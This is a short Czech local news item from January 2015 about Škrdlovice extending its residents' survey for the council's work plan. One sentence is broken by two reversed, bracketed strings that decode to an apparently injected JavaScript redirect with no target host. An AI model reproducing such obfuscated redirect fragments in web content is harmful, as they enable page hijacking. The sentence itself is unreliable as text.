Škrdlovice
Rainbow page separator

Ve Škrdlovicích prodloužili dotazníkový průzkum

Neděle, 25. ledna 2015

Škrdlovice / Prodloužit dotazníkové šetření mezi obyvateli obce se rozhodli ve Škrdlovicích – anonymně vyplněné dotazníky, které byly do tamních domácností distribuovány v druhé polovině prosince, mohou lidé odevzdávat až do 15. února. Výstup z šetření chtějí tamní zastupitelé zapracovat do svého plánu práce. „Výsledek bude použit jako podklad pro zpracování plánu práce zastupitelstva obce Škrdlovice pro volební období 2014-2018. Děkujeme všem zúčastněným za spolupráci při tvorbě plánu práce zastupitelstva,“ uvedl škrdlovický starosta Ivan Hořínek.
Dotazník je možné vyplnit i elektronicky, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to například prostřednictvím webových stránek obce. Tištěný formulář je k dispozici v tamním obecním úřadě. Důvodem akce zaměřené na všechny oblasti života obce a jejího rozvoje bylo rozhodnutí zastupitelstva o zapojení veřejnosti do tvorby plánu práce vedení obce.